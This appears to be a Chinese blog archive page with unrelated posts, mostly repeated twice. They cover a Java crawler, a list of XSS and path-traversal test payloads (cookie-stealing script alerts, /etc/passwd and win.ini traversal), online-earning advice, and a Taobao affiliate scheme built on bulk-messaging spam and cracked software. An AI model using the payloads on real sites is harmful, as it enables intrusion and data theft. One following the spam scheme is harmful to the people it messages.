10月25
其实这是一个web搜索的基本程序,从命令行输入搜索条件,起始的URL、处理url的最大数、要搜索的字符串,它就会逐个对Internet上的URL进行实时搜索,查找并输出匹配搜索条件的页面。 这个程序的原型来自《java编程艺术》,为了更好的分析,Heck去掉了其中的GUI部分,并稍作修改以适用jdk1.5。以这个程序为基础,可以写出在互联网上搜索诸如图像、邮件、网页下载之类的“爬虫”。
先请看程序运行的过程:
D:\java>javac SearchCrawler.java
D:\java>java SearchCrawler http://127.0.0.1:8080/webhome/index.jsp 20 java
Start searching...
result:
searchString=java
http://127.0.0.1:8080/webhome/index.jsp
http://127.0.0.1:8080/webhome/reply.jsp
http://127.0.0.1:8080/webhome/learn.jsp
http://127.0.0.1:8080/webhome/download.jsp
http://127.0.0.1:8080/webhome/article.jsp
http://127.0.0.1:8080/webhome/HeckGUIOverview.htm
http://127.0.0.1:8080/webhome/myexample/Proxooldoc/index.html
http://127.0.0.1:8080/webhome/view.jsp?id=301
http://127.0.0.1:8080/webhome/view.jsp?id=297
http://127.0.0.1:8080/webhome/view.jsp?id=291
http://127.0.0.1:8080/webhome/view.jsp?id=286
http://127.0.0.1:8080/webhome/view.jsp?id=285
http://127.0.0.1:8080/webhome/view.jsp?id=284
http://127.0.0.1:8080/webhome/view.jsp?id=276
http://127.0.0.1:8080/webhome/view.jsp?id=272
先请看程序运行的过程:
D:\java>javac SearchCrawler.java
D:\java>java SearchCrawler http://127.0.0.1:8080/webhome/index.jsp 20 java
Start searching...
result:
searchString=java
http://127.0.0.1:8080/webhome/index.jsp
http://127.0.0.1:8080/webhome/reply.jsp
http://127.0.0.1:8080/webhome/learn.jsp
http://127.0.0.1:8080/webhome/download.jsp
http://127.0.0.1:8080/webhome/article.jsp
http://127.0.0.1:8080/webhome/HeckGUIOverview.htm
http://127.0.0.1:8080/webhome/myexample/Proxooldoc/index.html
http://127.0.0.1:8080/webhome/view.jsp?id=301
http://127.0.0.1:8080/webhome/view.jsp?id=297
http://127.0.0.1:8080/webhome/view.jsp?id=291
http://127.0.0.1:8080/webhome/view.jsp?id=286
http://127.0.0.1:8080/webhome/view.jsp?id=285
http://127.0.0.1:8080/webhome/view.jsp?id=284
http://127.0.0.1:8080/webhome/view.jsp?id=276
http://127.0.0.1:8080/webhome/view.jsp?id=272
10月25
很多网站存在xss 跨站脚本漏洞,下面的安全测试测用例还是挺管用的,能够查找和发现潜在的bug,大家可以试试看吧。
<script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
<script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
10月25
最近通过Heck博客向我咨询的朋友有很多,一般情况下只要有时间我都非常乐意聊会,对于网络赚钱专职还是兼职这个问题Heck认为非常有必要专门写篇文章和大家交流下,也给很多想进入网络赚钱这行的朋友作个参考。
无论您是否想专职还是兼职做网络赚钱这行,首先必须弄明白一个问题:网络是否真的能赚钱?我可以非常明确的告诉你网络赚钱是真实可行的,但是想赚更多也不是件容易的事情!
接下来Heck分别对网络赚钱专职和兼职做个简单的对比:
1.网络赚钱专职
优点:自由,你可以每天工作2个小时,或者今天心情不好也可以不工作,没有人管你;你可以穿着睡衣躺在床上工作,你也可以一边在线看电影、听歌一边工作,甚至是抱着GF或者Baby也可以。
缺点:你的圈子很小,除了每天能接触到的家人就是电脑,没有上班族的三天一小聚五天一大聚的的朋友圈子,时间长了你会发现你的生活就那么大点范围。
2.网络赚钱兼职
优点:自由,没错!兼职做网络赚钱是个好的主意,正常收入之余还能搞点额外收入,而且还没有任何的限制。
缺点:不能说兼职一定赚不了太多的钱,但是当每天繁忙的工作结束后回家还得工作是挺辛苦的。
“哥们,你是做什么的?”
“搞网络的。”
“高科技,不错,在哪上班?”
“还行吧,在家。”
在现实社会中,一般人都会认为只要是不出去上班而成天窝在家里的人是很没出息的,甚至包括自己的父母亲戚朋友等,当然,除非你的收入比那些上班的多!但是对此就引出一个问题:如果你对网络赚钱这行业是刚刚接触就想专职做的话,那你就得考虑来自各方面的压力,当然也包括自己给自己的压力。
无论您是否想专职还是兼职做网络赚钱这行,首先必须弄明白一个问题:网络是否真的能赚钱?我可以非常明确的告诉你网络赚钱是真实可行的,但是想赚更多也不是件容易的事情!
接下来Heck分别对网络赚钱专职和兼职做个简单的对比:
1.网络赚钱专职
优点:自由,你可以每天工作2个小时,或者今天心情不好也可以不工作,没有人管你;你可以穿着睡衣躺在床上工作,你也可以一边在线看电影、听歌一边工作,甚至是抱着GF或者Baby也可以。
缺点:你的圈子很小,除了每天能接触到的家人就是电脑,没有上班族的三天一小聚五天一大聚的的朋友圈子,时间长了你会发现你的生活就那么大点范围。
2.网络赚钱兼职
优点:自由,没错!兼职做网络赚钱是个好的主意,正常收入之余还能搞点额外收入,而且还没有任何的限制。
缺点:不能说兼职一定赚不了太多的钱,但是当每天繁忙的工作结束后回家还得工作是挺辛苦的。
“哥们,你是做什么的?”
“搞网络的。”
“高科技,不错,在哪上班?”
“还行吧,在家。”
在现实社会中,一般人都会认为只要是不出去上班而成天窝在家里的人是很没出息的,甚至包括自己的父母亲戚朋友等,当然,除非你的收入比那些上班的多!但是对此就引出一个问题:如果你对网络赚钱这行业是刚刚接触就想专职做的话,那你就得考虑来自各方面的压力,当然也包括自己给自己的压力。
10月25
已经好久没去阿里妈妈论坛混了,今天去看了看,发现一篇关于淘宝客的推广方法介绍的还算全面。整理了一下给大家,希望会有用。
方法其实不是最重要的,重在坚持,找到一种最适合自己的方法,然后坚持走下去,肯定会收效的。
1、SNS网店软文推广法:现在SNS类型的网店非常流行,去SNS网店主要是去几个有人气的SNS网店有针对性的加几百上千个用户。然后选择合适的软文并合理的附带上网店链接,发表到自己的日志里。再让自的一些好友分享,这样就让很多人都关注到你的文章,关注到了你的网店。
2、SNS网店API合作推广法:如果你自己或下面的员工有一定的技术实力,可以开发一些和自己网店产品相关的小插件,插到校内上,插到海内上。只要有开放API的SNS网店都去插下。现在很多网店都有在这么搞,去校内看看哪些开放的应用程序,很多都是一些小网店提供的,而且上面都或多或少有挂自己网店的广告。而且这个市场越早做越好,很多SNS网店都是才开始尝试开发API,审核的要求还不是特别严格。等以后做的网店多了,再想插到SNS网店里去就难了。
3、收藏夹推广法:把一些精彩内容的页面添加到QQ书签,百度搜藏,雅虎收藏等,让喜欢这些内容的网民去阅读,收藏。
4、版主联盟推广法:这个方法适合论坛社区网店的推广。也就是先去加入一些版主联盟,像大旗版主联盟就很不错,每天把论坛的一些精彩内容提交上去,等待被相关频道录用,一经录用,那就会给你带去不少的IP.我最多的一次是两天就给网店带去了3W多的IP点击量。
5、回复置顶推广法:其实这个方法我也不知道该叫什么名字,它的局限性很小,据我所知,只使用于猫扑大杂烩,就暂且叫回复置顶吧。这个方法是我偶然发现的,是在看网店IP来路的时候发现的,发现那天有200多的IP来自猫扑的一个帖子,但是我知道我们没有去那里发过推广帖,所以觉得有点奇怪,就去那个帖子看看,发现是有人放了我们网店的一个链接,并且回复置顶了,所以才给我们带来了200多的IP.后来我就去和一些常在猫扑混的网友聊,才知道可以用一种叫“月明符”的道具来置顶回复。版主还不能删,只要管理员才有权删,所以一般情况下都能置顶一段时间。
方法其实不是最重要的,重在坚持,找到一种最适合自己的方法,然后坚持走下去,肯定会收效的。
1、SNS网店软文推广法:现在SNS类型的网店非常流行,去SNS网店主要是去几个有人气的SNS网店有针对性的加几百上千个用户。然后选择合适的软文并合理的附带上网店链接,发表到自己的日志里。再让自的一些好友分享,这样就让很多人都关注到你的文章,关注到了你的网店。
2、SNS网店API合作推广法:如果你自己或下面的员工有一定的技术实力,可以开发一些和自己网店产品相关的小插件,插到校内上,插到海内上。只要有开放API的SNS网店都去插下。现在很多网店都有在这么搞,去校内看看哪些开放的应用程序,很多都是一些小网店提供的,而且上面都或多或少有挂自己网店的广告。而且这个市场越早做越好,很多SNS网店都是才开始尝试开发API,审核的要求还不是特别严格。等以后做的网店多了,再想插到SNS网店里去就难了。
3、收藏夹推广法:把一些精彩内容的页面添加到QQ书签,百度搜藏,雅虎收藏等,让喜欢这些内容的网民去阅读,收藏。
4、版主联盟推广法:这个方法适合论坛社区网店的推广。也就是先去加入一些版主联盟,像大旗版主联盟就很不错,每天把论坛的一些精彩内容提交上去,等待被相关频道录用,一经录用,那就会给你带去不少的IP.我最多的一次是两天就给网店带去了3W多的IP点击量。
5、回复置顶推广法:其实这个方法我也不知道该叫什么名字,它的局限性很小,据我所知,只使用于猫扑大杂烩,就暂且叫回复置顶吧。这个方法是我偶然发现的,是在看网店IP来路的时候发现的,发现那天有200多的IP来自猫扑的一个帖子,但是我知道我们没有去那里发过推广帖,所以觉得有点奇怪,就去那个帖子看看,发现是有人放了我们网店的一个链接,并且回复置顶了,所以才给我们带来了200多的IP.后来我就去和一些常在猫扑混的网友聊,才知道可以用一种叫“月明符”的道具来置顶回复。版主还不能删,只要管理员才有权删,所以一般情况下都能置顶一段时间。
10月25
网络赚钱其实不是空想,有些人做站或者开网店一天收入上千上万都有,靠的是什么?其实很简单,主要是网赚项目选择得对不对,下面是关于利用淘宝做淘宝客的思路。
本来这个项目是想我自己的做的但是我最近太忙了没有时间所以我才吐血我的这个网赚思路分享出来,先说明这个项目我没有做过但是如果会做的人绝对能够挣到钱的。
思路主要就是利用淘宝网来做淘宝客,用的工具用阿里旺旺,再就是阿里旺旺群发器,已经若干个阿里旺旺的账号,当然还要有支付宝账号,当然是收钱用的,最主要的就是有时间跟耐心。
现在我来讲一下做这个项目需要什么:
第一:我们需要的是一个阿里旺旺的聊天软件,我想这个大家都很熟悉了跟QQ是一样的,如果没有的朋友可以去下载安装。这里注意一定要下载使用2009版 的阿里旺旺,带回我会告诉大家为什么需要09版的旺旺。
第二:我们需要的是一款能够群发的阿里旺旺群发软件,比如:群发宝宝.千里马旺旺群发.赛翔旺旺群发,王牌阿里旺旺群发,在这里注意的是你可以花钱去买正版软件你也可以去在网上找破解版,我也看过很多阿里旺旺全发软件他们支持的版本都是2009版.所以我才教大家去下载09版的旺旺,一般的卖群发软件的都会告诉你这个问题的。在这里我们只用到的功能就是群发跟挖墙脚,挖墙角就是把别人的买家通过软件加到自己的阿里旺旺上。
本来这个项目是想我自己的做的但是我最近太忙了没有时间所以我才吐血我的这个网赚思路分享出来,先说明这个项目我没有做过但是如果会做的人绝对能够挣到钱的。
思路主要就是利用淘宝网来做淘宝客,用的工具用阿里旺旺,再就是阿里旺旺群发器,已经若干个阿里旺旺的账号,当然还要有支付宝账号,当然是收钱用的,最主要的就是有时间跟耐心。
现在我来讲一下做这个项目需要什么:
第一:我们需要的是一个阿里旺旺的聊天软件,我想这个大家都很熟悉了跟QQ是一样的,如果没有的朋友可以去下载安装。这里注意一定要下载使用2009版 的阿里旺旺,带回我会告诉大家为什么需要09版的旺旺。
第二:我们需要的是一款能够群发的阿里旺旺群发软件,比如:群发宝宝.千里马旺旺群发.赛翔旺旺群发,王牌阿里旺旺群发,在这里注意的是你可以花钱去买正版软件你也可以去在网上找破解版,我也看过很多阿里旺旺全发软件他们支持的版本都是2009版.所以我才教大家去下载09版的旺旺,一般的卖群发软件的都会告诉你这个问题的。在这里我们只用到的功能就是群发跟挖墙脚,挖墙角就是把别人的买家通过软件加到自己的阿里旺旺上。
10月25
跨域问题是由浏览器安全性限制而引起的,不同浏览器的安全性限制还不一样,当然啦我们可以采取变通的方法来解决这个跨域的问题。
方法一、采用动态创建<script type="text/javascript" src="http://另外一个域名/getdata.aspx?user=Heck&pwd=Heck"></script>
而这个aspx可以返回一段JS数据,来回调调用页面中的一个JS方法 比如说 showmessage("返回成功"); 这样可以达到隐性提交的目的。(在跨域下可以实现JAX同样的效果)。但这种方法由于URL长度的限制,不能提交太大的数据,和不能进行POST请求,而且你还要又B域的输出控制权。
方法二、直接把表单提交,提交的页面处理完毕后他直接太跳转下,同时把相关信息在提交给相同的域名下的一个文件,由本域名下的文件做输出这样其实就是同域了。不过这种方法编程会很复杂,流程控制很麻烦。
方法三、采用ASPX文件做桥的方式,比如说 你想在A上请求B域名上的文件b,则你可以通过在A上请求A上的文件a,a在服务器端请求B下的b,a文件相当于做了个中装,这样在有些网站上是不可取的,因为效率不高,相应很慢,还耗费服务器带宽等资源。
方法一、采用动态创建<script type="text/javascript" src="http://另外一个域名/getdata.aspx?user=Heck&pwd=Heck"></script>
而这个aspx可以返回一段JS数据,来回调调用页面中的一个JS方法 比如说 showmessage("返回成功"); 这样可以达到隐性提交的目的。(在跨域下可以实现JAX同样的效果)。但这种方法由于URL长度的限制,不能提交太大的数据,和不能进行POST请求,而且你还要又B域的输出控制权。
方法二、直接把表单提交,提交的页面处理完毕后他直接太跳转下,同时把相关信息在提交给相同的域名下的一个文件,由本域名下的文件做输出这样其实就是同域了。不过这种方法编程会很复杂,流程控制很麻烦。
方法三、采用ASPX文件做桥的方式,比如说 你想在A上请求B域名上的文件b,则你可以通过在A上请求A上的文件a,a在服务器端请求B下的b,a文件相当于做了个中装,这样在有些网站上是不可取的,因为效率不高,相应很慢,还耗费服务器带宽等资源。
